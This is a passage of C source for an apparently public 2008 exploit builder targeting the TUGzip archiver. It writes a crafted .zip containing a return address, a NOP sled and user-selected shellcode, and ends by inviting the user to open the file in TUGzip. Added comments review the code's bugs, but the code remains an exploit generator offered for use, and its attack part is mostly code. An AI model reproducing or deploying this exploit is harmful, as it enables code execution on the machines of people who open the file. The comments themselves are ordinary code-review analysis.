    // argv[2] is dereferenced HERE, before the argument-count check that
    // follows, and without any range check against the size of targets[]:
    // with only one argument argv[2] is NULL (argv[argc]), and any index
    // outside the table reads past it.  Note also that the guard below tests
    // argc<2 while argv[2] requires argc>=3.
    unsigned int retaddress=targets[atoi(argv[2])].addr; 
       if(argc<2) 
                       {     printf("#   tChose your Platform #n"); 
                             // targets[] ends with a row whose platform is NULL.
                             for(int i=0;targets[i].platform;i++)
                             printf("%d tt %sn",i,targets[i].platform);
                             printf("tUsage is:n");
                             // Non-literal format string: argv[0] is used as the
                             // format itself.  printf("%s",argv[0]) is the safe form.
                             printf(argv[0]);
                             printf(".exe ");
                             printf("filename.zip ");
                             printf("platformn");                  
                             printf("t*****Credits for exploit and finding the bug go to Stefan Marin******n");  
                       
                             // Windows-only: spawns a shell for the "color" command;
                             // Sleep() comes from windows.h.  'buffer' is leaked on this path.
                             system("color 02");
                             Sleep(2000);
                          return 0;  
                       }
                       
     // Opens the output file from argv[1] (no argc>=2 guarantee at this point
     // beyond the check above).  On failure 'buffer' is leaked and exit(0)
     // reports success to the caller.
     if((h=fopen(argv[1],"wb"))==NULL)
  {    printf("errorn"); 
       exit(0);
  }
                 
     // Lay out the image: file_1 first, then file_2 starting at offset
     // sizeof(file_1)-1, i.e. over file_1's NUL terminator, so the two arrays
     // are joined with no stray 0 byte between them.
     memcpy(buffer,file_1,sizeof(file_1)); offset=sizeof(file_1);   
     memcpy(buffer+offset-1,file_2,sizeof(file_2));    offset=OFFSET;
     // 4 bytes of the selected targets[].addr go at OFFSET.  The 'offset=0'
     // that follows is immediately overwritten by offset=NOP and has no effect.
     memcpy(buffer+offset,&retaddress,4); offset=0; offset=NOP;
     // 20 bytes of 0x90 at NOP.
     memset(buffer+offset,0x90,20);
      
      printf("#___________________________________________________________________________#n");
      printf("Now chose your shellcode n");
      printf("Press [1] for Alphanumeric shellcoden");
      printf("Press [2] for NonAphanumeric shellcoden");
      printf("#___________________________________________________________________________#n");
       
                   // scanf's return value is not checked: on non-numeric input
                   // 'number' is read uninitialized by the switch below.
                   scanf("%d",&number);                   
                                      // 'case 1' has no 'break', so choice 1 copies shellcode_1
                                      // and then falls into 'case 2', which copies shellcode_2
                                      // over the same offset.  There is no 'default': any other
                                      // number copies nothing.  Neither memcpy checks that
                                      // shellcode_offset+sizeof(...) stays inside 'buffer'.
                                      switch(number)
                         { case 1:
                                 offset=shellcode_offset;
                                 memcpy(buffer+offset,shellcode_1,sizeof(shellcode_1));                  
                           case 2:
                                 offset=shellcode_offset;
                                 memcpy(buffer+offset,shellcode_2,sizeof(shellcode_2)); 
                         }                        
     // Writes the whole allocation.  Because file_2 was placed at offset-1,
     // its last byte lands at index sizeof(file_1)+sizeof(file_2)-2, so the
     // final byte of 'buffer' is never initialized (unless a shellcode copy
     // reaches it) and one indeterminate byte ends up in the file.  Return
     // values of fwrite and fclose are not checked.
     fwrite(buffer,1,sizeof(file_1)+sizeof(file_2),h); 
     printf("Building file ...n");
     printf("Done ! Open with TUGzip and see what happens :) n");
     printf("t*****Credits for exploit and finding the bug go to Stefan Marin******n"); 
     fclose(h);
     free(buffer);
return 0;    
       }

// www.Syue.com [2008-10-24]